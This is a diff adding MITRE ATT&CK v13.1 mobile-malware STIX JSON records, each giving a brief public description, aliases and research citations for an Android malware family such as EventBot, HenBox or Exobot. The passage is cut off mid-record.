+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a993495c-9813-4372-b9ec-d168c7f7ec0a.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--33c1d4c8-9f51-482e-9d44-4a80d1f17abd", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "GPlayed" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "type": "malware", + "created": "2020-11-24T17:55:12.561Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0536", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0536" + }, + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.561Z", + "name": "GPlayed", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) is an Android trojan with a broad range of capabilities.(Citation: Talos GPlayed) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--aecc0097-c9f8-4786-9b39-e891ff173f54.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--aecc0097-c9f8-4786-9b39-e891ff173f54.json new file mode 100644 index 0000000000000000000000000000000000000000..61d9de34d4796ccec395e3c48a381937606eb504 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--aecc0097-c9f8-4786-9b39-e891ff173f54.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--94df2d37-6456-49a2-ace2-9683d0fd7345", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "EventBot" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "type": "malware", + "created": "2020-06-26T14:55:12.847Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0478", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0478" + }, + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T21:01:58.595Z", + "name": "EventBot", + "description": "[EventBot](https://attack.mitre.org/software/S0478) is an Android banking trojan and information stealer that abuses Android\u2019s accessibility service to steal data from various applications.(Citation: Cybereason EventBot) [EventBot](https://attack.mitre.org/software/S0478) was designed to target over 200 different banking and financial applications, the majority of which are European bank and cryptocurrency exchange applications.(Citation: Cybereason EventBot)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--aef537ba-10c2-40ed-a57a-80b8508aada4.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--aef537ba-10c2-40ed-a57a-80b8508aada4.json new file mode 100644 index 0000000000000000000000000000000000000000..b225116e8f9613c505932037ff3046486935ddc7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--aef537ba-10c2-40ed-a57a-80b8508aada4.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--61ceb2c7-7d85-45e5-8f86-4fcb256cdb12", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "HenBox" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "type": "malware", + "created": "2020-12-17T20:15:22.110Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0544", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0544" + }, + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2021-04-12T03:02:06.792Z", + "name": "HenBox", + "description": "[HenBox](https://attack.mitre.org/software/S0544) is Android malware that attempts to only execute on Xiaomi devices running the MIUI operating system. [HenBox](https://attack.mitre.org/software/S0544) has primarily been used to target Uyghurs, a minority Turkic ethnic group.(Citation: Palo Alto HenBox)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c0efbaae-9e7d-4716-a92d-68373aac7424.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c0efbaae-9e7d-4716-a92d-68373aac7424.json new file mode 100644 index 0000000000000000000000000000000000000000..83853b65b7317722c9f87fad746ae3e6c566175c --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c0efbaae-9e7d-4716-a92d-68373aac7424.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--0ae429c5-b2b3-4dd6-ab62-eb1e162318e7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Riltok" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "type": "malware", + "created": "2019-08-07T15:57:12.877Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0403", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0403" + }, + { + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019.", + "url": "https://securelist.com/mobile-banker-riltok/91374/", + "source_name": "Kaspersky Riltok June 2019" + } + ], + "modified": "2019-09-18T13:44:13.080Z", + "name": "Riltok", + "description": "[Riltok](https://attack.mitre.org/software/S0403) is banking malware that uses phishing popups to collect user credentials.(Citation: Kaspersky Riltok June 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c.json new file mode 100644 index 0000000000000000000000000000000000000000..baaf0b5f099c2741171fffce880f42def6aeb6c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--d035a907-d888-4909-84e1-56be02857455", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "GolfSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "type": "malware", + "created": "2020-01-27T17:05:57.712Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0421", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0421" + }, + { + "source_name": "Trend Micro Bouncing Golf 2019", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign \u2018Bouncing Golf\u2019 Affects Middle East. Retrieved January 27, 2020." + } + ], + "modified": "2020-03-26T20:50:07.023Z", + "name": "GolfSpy", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) is Android spyware deployed by the group [Bouncing Golf](https://attack.mitre.org/groups/G0097).(Citation: Trend Micro Bouncing Golf 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878.json new file mode 100644 index 0000000000000000000000000000000000000000..3316ebf0fad47a15c2ab08634ee024c8df4f84b2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--568445c5-ba3f-42f5-a61b-2b6c1b80db71", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Pallas" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "type": "malware", + "created": "2019-07-10T15:35:43.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0399", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0399" + }, + { + "source_name": "Pallas", + "description": "(Citation: Lookout Dark Caracal Jan 2018)" + }, + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-09-18T20:17:17.744Z", + "name": "Pallas", + "description": "[Pallas](https://attack.mitre.org/software/S0399) is mobile surveillanceware that was custom-developed by [Dark Caracal](https://attack.mitre.org/groups/G0070).(Citation: Lookout Dark Caracal Jan 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c6a07c89-a24c-4c7e-9e3e-6153cc595e24.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c6a07c89-a24c-4c7e-9e3e-6153cc595e24.json new file mode 100644 index 0000000000000000000000000000000000000000..d7f75b2394f98b45595b2bcdec2f026b58f28cf1 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c6a07c89-a24c-4c7e-9e3e-6153cc595e24.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--6fdf805c-cb19-4939-ba96-f302d0e85d6f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Circles" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c6a07c89-a24c-4c7e-9e3e-6153cc595e24", + "type": "malware", + "created": "2021-04-26T15:33:55.798Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0602", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0602" + }, + { + "source_name": "CitizenLab Circles", + "url": "https://citizenlab.ca/2020/12/running-in-circles-uncovering-the-clients-of-cyberespionage-firm-circles/", + "description": "Bill Marczak, John Scott-Railton, Siddharth Prakash Rao, Siena Anstis, and Ron Deibert. (2020, December 1). Running in Circles Uncovering the Clients of Cyberespionage Firm Circles. Retrieved December 23, 2020." + } + ], + "modified": "2021-04-26T15:33:55.798Z", + "name": "Circles", + "description": "[Circles](https://attack.mitre.org/software/S0602) reportedly takes advantage of Signaling System 7 (SS7) weaknesses, the protocol suite used to route phone calls, to both track the location of mobile devices and intercept voice calls and SMS messages. It can be connected to a telecommunications company\u2019s infrastructure or purchased as a cloud service. Circles has reportedly been linked to the NSO Group.(Citation: CitizenLab Circles)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0.json new file mode 100644 index 0000000000000000000000000000000000000000..5f10c38a0a90bf9814e7da1f774ddb6e3cfac7c7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--4e6d1181-2e52-485d-aafa-f1e74094a0b5", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Tiktok Pro" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "type": "malware", + "created": "2021-01-05T20:16:19.968Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0558", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0558" + }, + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-04-19T16:30:16.930Z", + "name": "Tiktok Pro", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) is spyware that has been masquerading as the TikTok application.(Citation: Zscaler TikTok Spyware)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c709da93-20c3-4d17-ab68-48cba76b2137.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c709da93-20c3-4d17-ab68-48cba76b2137.json new file mode 100644 index 0000000000000000000000000000000000000000..91eb89fae311e4974b7f34e3a441d51be0489c43 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c709da93-20c3-4d17-ab68-48cba76b2137.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--8068635a-ed0d-4cde-9d3d-2fd70e2e5ce7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "PJApps", + "description": "[PJApps](https://attack.mitre.org/software/S0291) is an Android malware family. (Citation: Lookout-EnterpriseApps)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--c709da93-20c3-4d17-ab68-48cba76b2137", + "created": "2017-10-25T14:48:43.527Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0291", + "external_id": "S0291" + }, + { + "source_name": "PJApps", + "description": "(Citation: Lookout-EnterpriseApps)" + }, + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c80a6bef-b3ce-44d0-b113-946e93124898.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c80a6bef-b3ce-44d0-b113-946e93124898.json new file mode 100644 index 0000000000000000000000000000000000000000..bce0835306f49cd748371793b2c2541035e1d264 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c80a6bef-b3ce-44d0-b113-946e93124898.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--f6bed46f-8959-4b91-a8ed-930e091cc3b0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "ShiftyBug", + "description": "[ShiftyBug](https://attack.mitre.org/software/S0294) is an auto-rooting adware family of malware for Android. The family is very similar to the other Android families known as Shedun, Shuanet, Kemoge, though it is not believed all the families were created by the same group. (Citation: Lookout-Adware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--c80a6bef-b3ce-44d0-b113-946e93124898", + "created": "2017-10-25T14:48:38.690Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0294", + "external_id": "S0294" + }, + { + "source_name": "ShiftyBug", + "description": "(Citation: Lookout-Adware)" + }, + { + "source_name": "Lookout-Adware", + "description": "Michael Bentley. (2015, November 4). Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2015/11/04/trojanized-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c8770c81-c29f-40d2-a140-38544206b2b4.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c8770c81-c29f-40d2-a140-38544206b2b4.json new file mode 100644 index 0000000000000000000000000000000000000000..eba4e12901357b042a766e68429449628ab97a0a --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c8770c81-c29f-40d2-a140-38544206b2b4.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--db7b04e7-f6a0-4222-b056-a78f6b3e4cfe", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-21T18:52:08.966Z", + "name": "HummingBad", + "description": "[HummingBad](https://attack.mitre.org/software/S0322) is a family of Android malware that generates fraudulent advertising revenue and has the ability to obtain root access on older, vulnerable versions of Android. (Citation: ArsTechnica-HummingBad)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "HummingBad" + ], + "type": "malware", + "id": "malware--c8770c81-c29f-40d2-a140-38544206b2b4", + "created": "2017-10-25T14:48:42.948Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0322", + "external_id": "S0322" + }, + { + "source_name": "ArsTechnica-HummingBad", + "description": "Dan Goodin. (2016, July 7). 10 million Android phones infected by all-powerful auto-rooting apps. Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c91cec55-634c-4670-ba10-2dc7ceb28e98.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c91cec55-634c-4670-ba10-2dc7ceb28e98.json new file mode 100644 index 0000000000000000000000000000000000000000..90dd5dba8a2d536ab7f60ef4890f7daf4e10480e 
--- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c91cec55-634c-4670-ba10-2dc7ceb28e98.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--50d98910-a2ca-4905-b12a-dc19838f39fb", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Exobot", + "Marcher" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "type": "malware", + "created": "2020-10-29T13:32:20.972Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0522", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0522" + }, + { + "source_name": "Proofpoint-Marcher", + "description": "Proofpoint. (2017, November 3). Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018.", + "url": "https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks" + }, + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." + } + ], + "modified": "2020-12-07T14:28:31.876Z", + "name": "Exobot", + "description": "[Exobot](https://attack.mitre.org/software/S0522) is Android banking malware, primarily targeting financial institutions in Germany, Austria, and France.(Citation: Threat Fabric Exobot)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ca4f63b9-a358-4214-bb26-8c912318cfde.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ca4f63b9-a358-4214-bb26-8c912318cfde.json new file mode 100644 index 0000000000000000000000000000000000000000..fce22b1cea312ef5c2372c1d39e50fd4b17ca89b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ca4f63b9-a358-4214-bb26-8c912318cfde.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--a7defb13-9aec-42b0-bc62-24ee9bf251a7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "OBAD", + "description": "OBAD is an Android malware family. (Citation: TrendMicro-Obad)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--ca4f63b9-a358-4214-bb26-8c912318cfde", + "created": "2017-10-25T14:48:44.540Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0286", + "external_id": "S0286" + }, + { + "source_name": "OBAD", + "description": "(Citation: TrendMicro-Obad)" + }, + { + "source_name": "TrendMicro-Obad", + "description": "Veo Zhang. (2013, June 13). Cybercriminals Improve Android Malware Stealth Routines with OBAD. Retrieved December 9, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d05f7357-4cbe-47ea-bf83-b8604226d533.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d05f7357-4cbe-47ea-bf83-b8604226d533.json new file mode 100644 index 0000000000000000000000000000000000000000..bc832a2e546bb8b639b7b19f9da472b4f4d608bb --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d05f7357-4cbe-47ea-bf83-b8604226d533.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--5f94a680-b843-471f-9c9c-a8d41e9a4245", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Android/Chuli.A", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) is Android malware that was delivered to activist groups via a spearphishing email with an attachment. (Citation: Kaspersky-WUC)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Android/Chuli.A" + ], + "type": "malware", + "id": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "created": "2017-10-25T14:48:45.482Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0304", + "external_id": "S0304" + }, + { + "source_name": "Android/Chuli.A", + "description": "(Citation: Kaspersky-WUC)" + }, + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d1c600f8-0fb6-4367-921b-85b71947d950.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d1c600f8-0fb6-4367-921b-85b71947d950.json new file mode 100644 index 0000000000000000000000000000000000000000..2fdb7941a6b45de6581e2d64a491b0f8cdef152e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d1c600f8-0fb6-4367-921b-85b71947d950.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--8c094989-32f9-4ebe-bcde-f2db23e919ff", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Charger", + "description": "[Charger](https://attack.mitre.org/software/S0323) is Android malware that steals steals contacts and SMS messages from the user's device. It can also lock the device and demand ransom payment if it receives admin permissions. (Citation: CheckPoint-Charger)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Charger" + ], + "type": "malware", + "id": "malware--d1c600f8-0fb6-4367-921b-85b71947d950", + "created": "2017-10-25T14:48:39.631Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0323", + "external_id": "S0323" + }, + { + "source_name": "Charger", + "description": "(Citation: CheckPoint-Charger)" + }, + { + "source_name": "CheckPoint-Charger", + "description": "Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. Retrieved January 24, 2017.", + "url": "http://blog.checkpoint.com/2017/01/24/charger-malware/" + } + ], + "object_marking_refs": [ + 